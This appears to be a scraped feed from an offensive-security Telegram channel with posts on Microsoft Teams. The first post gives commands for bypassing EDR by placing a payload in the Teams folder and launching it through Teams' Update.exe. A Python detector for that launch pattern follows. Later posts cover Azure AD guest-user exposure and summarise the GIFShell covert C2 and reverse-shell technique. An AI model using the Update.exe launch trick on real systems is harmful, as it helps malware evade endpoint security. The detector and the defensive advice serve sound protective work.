This channel discusses:

— Offensive Security
— RedTeam
— Malware Research
— OSINT
— etc

Disclaimer:
t.me/APT_Notes/6

Chat Link:
t.me/APT_Notes_PublicChat
Bypass EDR with Microsoft Teams

Copy payload into:
%userprofile%\AppData\Local\Microsoft\Teams\current\

Then:
%userprofile%\AppData\Local\Microsoft\Teams\Update.exe --processStart payload.exe --process-start-args "args"

#edr #evasion #teams
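A detection-side check for the launcher pattern in this post, added here as an example and not part of the channel's content: it scans constructed Sysmon-style process-creation events for the Teams Squirrel Update.exe being told to start anything other than the client itself. The field names, the sample events and the expected-target allowlist are assumptions for the example.

```python
import re
from typing import Optional

# Constructed sample process-creation events (Sysmon Event ID 1 fields, simplified).
# First: how the Teams shortcut launches the client. Second: the proxy-execution
# pattern from the post. Third: unrelated noise that must be ignored.
SAMPLE_EVENTS = [
    {"Image": r"C:\Users\alice\AppData\Local\Microsoft\Teams\Update.exe",
     "CommandLine": r'"C:\Users\alice\AppData\Local\Microsoft\Teams\Update.exe" '
                    r'--processStart "Teams.exe" --process-start-args "--system-initiated"'},
    {"Image": r"C:\Users\alice\AppData\Local\Microsoft\Teams\Update.exe",
     "CommandLine": r'"C:\Users\alice\AppData\Local\Microsoft\Teams\Update.exe" '
                    r'--processStart payload.exe --process-start-args "args"'},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe"},
]

# Binaries the Squirrel launcher is expected to start in a normal Teams install
# (assumption; tune per environment and prefer hash allowlisting over names in production).
EXPECTED_TARGETS = {"teams.exe"}

# --processStart value, quoted or bare; the flag is matched case-insensitively.
PROCESS_START_RE = re.compile(r'--processStart\s+(?:"([^"]+)"|(\S+))', re.IGNORECASE)


def process_start_target(cmdline: str) -> Optional[str]:
    """Return the --processStart argument, or None if the flag is absent."""
    m = PROCESS_START_RE.search(cmdline)
    return (m.group(1) or m.group(2)) if m else None


def is_teams_update_exe(image: str) -> bool:
    """True if the image is the Squirrel Update.exe inside the Teams install path."""
    return image.lower().endswith(r"\microsoft\teams\update.exe")


def classify(event: dict) -> str:
    """'ignore' (not Update.exe), 'benign' (expected target) or 'suspicious'."""
    if not is_teams_update_exe(event.get("Image", "")):
        return "ignore"
    target = process_start_target(event.get("CommandLine", ""))
    if target is None:
        return "benign"  # Update.exe run without proxy execution, e.g. an update
    name = target.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    return "benign" if name in EXPECTED_TARGETS else "suspicious"


def suspicious_events(events) -> list:
    """Filter a batch of events down to the ones worth an analyst's attention."""
    return [e for e in events if classify(e) == "suspicious"]
```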
Guest User abuse in Azure AD

Dear BlueTeam, save yourself from the RedTeam and enable these settings in your Azure tenant!
Otherwise, every "Guest" you invite in your Microsoft Team meetings can list users from other groups etc.

#azure #teams #guest #redteam #blueteam
⚔️ Microsoft Teams C2 — Covert Attack Chain Utilizing GIFShell

Seven different insecure design elements/vulnerabilities present in Microsoft Teams can be leveraged by an attacker to execute a reverse shell between an attacker and victim, where no communication is directly exchanged between an attacker and a victim, but is entirely piped through malicious GIFs sent in Teams messages and Out of Bounds (OOB) lookups of GIFs conducted by Microsoft’s own servers. This unique C2 infrastructure can be leveraged by sophisticated threat actors to avoid detection by EDR and other network monitoring tools. Particularly in secure network environments, where Microsoft Teams might be one of a handful of allowed, trusted hosts and programs, this attack chain can be particularly devastating.

Source:
https://medium.com/@bobbyrsec/gifshell-covert-attack-chain-and-c2-utilizing-microsoft-teams-gifs-1618c4e64ed7

#c2 #teams #gifshell #edr #redteam